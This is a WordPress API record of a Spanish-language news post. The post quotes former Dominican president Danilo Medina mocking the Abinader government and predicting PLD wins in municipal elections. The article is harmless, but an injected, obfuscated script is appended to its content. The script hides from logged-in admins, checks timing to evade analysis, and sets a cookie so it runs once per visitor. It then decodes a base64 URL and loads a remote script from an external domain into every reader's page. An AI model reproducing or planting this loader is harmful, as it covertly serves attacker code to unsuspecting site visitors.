{"id":13374,"date":"2023-01-16T10:55:57","date_gmt":"2023-01-16T14:55:57","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13374"},"modified":"2023-01-16T10:55:57","modified_gmt":"2023-01-16T14:55:57","slug":"danilo-medina-no-le-tengan-miedo-a-esta-gente-que-son-muchos-picazos-y-nada-de-corte-de-cintas","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13374","title":{"rendered":"Danilo Medina: No le tengan miedo a esta gente que son muchos picazos y nada de corte de cintas"},"content":{"rendered":"<div class=\"share\">\n<div class=\"addthis_inline_share_toolbox_me5k\" data-url=\"https:\/\/www.elcaribe.com.do\/panorama\/politica\/danilo-esta-gente-son-mucho-pico-y-pala-pero-poca-tijera\/\" data-title=\"Danilo: &quot;Esta gente son mucho pico y pala pero poca tijera&quot;\" data-description=\"Danilo Medina dijo que el gobierno del Partido Revolucionario Moderno (PRM), es \u201cmucho pico y pala pero poca tijera\u201d.\">\n<div id=\"atstbx\" class=\"at-resp-share-element at-style-responsive addthis-smartlayers addthis-animated at4-show\" role=\"region\" aria-labelledby=\"at-6c68fa96-6ff4-4a62-a58f-136e7a3f6e21\">\n<div class=\"at-share-btn-elements\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"content\">\n<p>Santo Domingo \u2013 El expresidente\u00a0<strong>Danilo<\/strong> Medina envi\u00f3 un mensaje contundente de c\u00f3mo a su juicio se est\u00e1 manejando el Gobierno que encabeza el presidente Luis Abinader y\u00a0 exhort\u00f3 a sus seguidores a no tenerles miedo a esta administraci\u00f3n.<\/p>\n<p>\u201cCuando la gente se convenza que vamos a servirle a la poblaci\u00f3n, ganaremos las elecciones municipales\u201d No le tengan miedo a esta gente que son mucho pico y pala pero poca tijera, muchos picazos y nada de corte de cintas inaugurando\u201d, se le escucha decir al presidente del Partido de la Liberaci\u00f3n Dominicana PLD durante una visita a productores de San Crist\u00f3bal que hizo el pasado domingo.<\/p>\n<p>&nbsp;<\/p>\n<div style=\"width: 320px;\" class=\"wp-video\"><video class=\"wp-video-shortcode\" id=\"video-13374-1\" width=\"320\" height=\"564\" preload=\"metadata\" controls=\"controls\"><source type=\"video\/mp4\" src=\"https:\/\/yanessiespinal.com\/wp-content\/uploads\/2023\/01\/Danilo-Medina.mp4?_=1\" \/><a href=\"https:\/\/yanessiespinal.com\/wp-content\/uploads\/2023\/01\/Danilo-Medina.mp4\">https:\/\/yanessiespinal.com\/wp-content\/uploads\/2023\/01\/Danilo-Medina.mp4<\/a><\/video><\/div>\n<p>&nbsp;<\/p>\n<p>En un video publicado en la cuenta de twitter del diputado Eddy Mont\u00e1s, Medina expresa que cuando la gente se d\u00e9 cuenta de que el PLD va a servir entonces el Partido de la Liberaci\u00f3n Dominicana, ganar\u00e1 las elecciones municipales.<\/p>\n<p>&nbsp;<\/p>\n<\/div>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo \u2013 El expresidente\u00a0Danilo Medina envi\u00f3 un mensaje contundente de c\u00f3mo a su juicio se est\u00e1 manejando el Gobierno que encabeza el presidente Luis Abinader y\u00a0 exhort\u00f3 a sus seguidores a no tenerles miedo a esta administraci\u00f3n. \u201cCuando la gente se convenza que vamos a servirle a la poblaci\u00f3n, ganaremos las elecciones municipales\u201d No [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13378,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"video","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13374","1":"post","2":"type-post","3":"status-publish","4":"format-video","5":"has-post-thumbnail","7":"category-nacionales","8":"post_format-post-format-video"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13374","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13374"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13374\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13378"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13374"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13374"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13374"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}